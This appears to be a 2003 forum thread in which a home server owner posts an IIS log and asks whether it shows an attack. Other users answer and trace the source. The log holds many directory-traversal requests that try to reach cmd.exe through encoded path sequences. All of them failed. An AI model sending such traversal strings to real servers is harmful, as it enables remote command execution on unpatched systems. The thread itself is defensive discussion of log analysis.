PCA Forums

I have a small FTP/Web server. I was looking through the FTP logs when I found some MP3's in a shared folder that were not mine. Well heres the logs...


!!!HTTP LOG!!!

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-02-03 04:06:44
#Fields: time c-ip cs-method cs-uri-stem sc-status
04:06:44 127.0.0.1 GET /links.phtml 404
04:06:44 127.0.0.1 GET /links.phtml 404
04:06:44 127.0.0.1 GET /links.phtml 404
04:06:44 127.0.0.1 GET /image-384476-1054757 404
04:12:15 12.212.218.114 GET /images/desktop.jpg 200
04:14:45 127.0.0.1 GET /links.phtml 404
04:14:45 127.0.0.1 GET /links.phtml 404
04:14:45 127.0.0.1 GET /links.phtml 404
04:14:45 127.0.0.1 GET /image-384476-1054757 404
04:34:31 192.168.0.112 OPTIONS / 200
04:34:31 192.168.0.112 PROPFIND /e 501
07:17:35 192.168.0.112 OPTIONS / 200
07:17:35 192.168.0.112 PROPFIND /e 501
07:31:17 192.168.0.112 OPTIONS / 200
07:31:17 192.168.0.112 PROPFIND /c 501
07:46:26 192.168.0.112 OPTIONS / 200
07:46:26 192.168.0.112 PROPFIND /e 501
08:08:23 192.168.0.112 OPTIONS / 200
08:10:09 192.168.0.112 OPTIONS / 200
08:12:03 192.168.0.112 OPTIONS / 200
08:13:06 209.122.110.241 HEAD /Default.htm 200
08:13:11 209.122.110.241 GET /msadc/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á%8s../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..À%9v../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /msadc/..À%qf../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á..Á..Á..Áwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..o../winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c..\winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/....../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%\..%\winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /msadc/..À/..À/winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /msadc/..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..Á..Á..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /msadc/.._../.._../.._../winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..o../winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/.._../winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/check.bat/..À/..À/..À/winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /msadc/check.bat/..Á..Á..Áwinnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /msadc/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..Á%pc../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..o../..o../..o../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /msadc/..Á%pc../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /msadc/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /msadc/..ð€€¯../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /msadc/..ø€€€¯../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /scripts/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..Á%8s../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..À%qf../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..Á../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..À%9v../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /msadc/..ð€€¯../winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /msadc/..ø€€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..o../..o../..o../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..o../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..Á%pc../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%\..%\winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%5c..\winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..ð€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/....../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /script/winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /script/..Á../..Á../..Á../winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /script/.._../.._../.._../winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á%8s../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /scripts/..À%qf../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /scripts/..Á..Á..Á..Á../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..À%9v../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:15:15 192.168.0.112 OPTIONS / 200
08:15:15 192.168.0.112 PROPFIND /e 501
12:34:04 80.196.111.238 GET /sumthin 404
17:55:07 127.0.0.1 GET /links.phtml 404
18:03:35 127.0.0.1 GET /ads/MSNHPB/00292MO0286_S4.gif 404
18:03:35 127.0.0.1 GET /ads/MSNBFP/00292T40136_D2.gif 404
18:07:36 192.168.0.112 OPTIONS / 200
18:07:36 192.168.0.112 PROPFIND /e 501
21:54:05 192.168.0.112 OPTIONS / 200
21:54:05 192.168.0.112 PROPFIND /e 501
21:59:22 192.168.0.112 OPTIONS / 200
21:59:22 192.168.0.112 PROPFIND /c 501

!!!END LOG!!!


Is this someone trying to hack? Trying to get CMD.EXE is a no no...any ideas here?

ya you were getting hacked... IIS man you should know better than to use that shit...

i wonder if he had an IP cloak

well judging by all the 500 errors and 404's he didnt get far. So I guess IIS isnt that bad now is it?

LOL ya if you've updated all of Winblowz then for the time being it ain't bad... anyone who runs IIS on a 2k or XP box that don't need it running gets what they deserve if they get hacked.. most people run it justfor a FTP when there's progs out there thatdo things so much better and easier...and SAFER!

tracert'd that IP and came back with avtivedom49.erols.com. Put the IP into my browser and came up with a starter page for IIS. hmmm......wonder if there morons, or if he spoofed his IP. IDK. I blocked the IP on my firewall anyways.

anyone with half a brain would be going through anonymous proxy's to hack anyways... so i highly doubt its their ip addy...

yep scanning for openings in iis


Registrant:
Erol's Internet Service (EROLS-DOM)
7921 Woodruff Court
Springfield
VA,22151
US

Domain Name: EROLS.COM

Administrative Contact:
RCN Terms of Service (ETS3-ORG) abuse@RCN.COM
RCN
7921 Woodruff Court
Springfield, VA 22151
US
703-321-8000
Fax- 703-321-8316
Technical Contact:
RCN (EROLS-NOC) domreg@RCN.COM
RCN
1 Federal St
Springfield, MA 01105
US
(609) 734-3700 fax: 609-919-8574

Record expires on 01-May-2011.
Record created on 30-Apr-1995.
Database last updated on 4-Feb-2003 02:13:27 EST.

Domain servers in listed order:

AUTH1.DNS.RCN.NET 207.172.3.20
AUTH3.DNS.RCN.NET 207.172.3.21
AUTH2.DNS.RCN.NET 207.172.3.20

you should contact them, they should be able to check there logs and do something about it, i dought it was spoofed script kiddies arent that brilliant these days but who knows

thanks alot for the info billygoat. I'll probably shoot them an email tomorrow. it is sleepy time now....

I get that with Apache as well...



I send net sends to the IP address that try's to hack me :-p

excellent idea dopey

dammit there machine is off! I'll be checking back later today though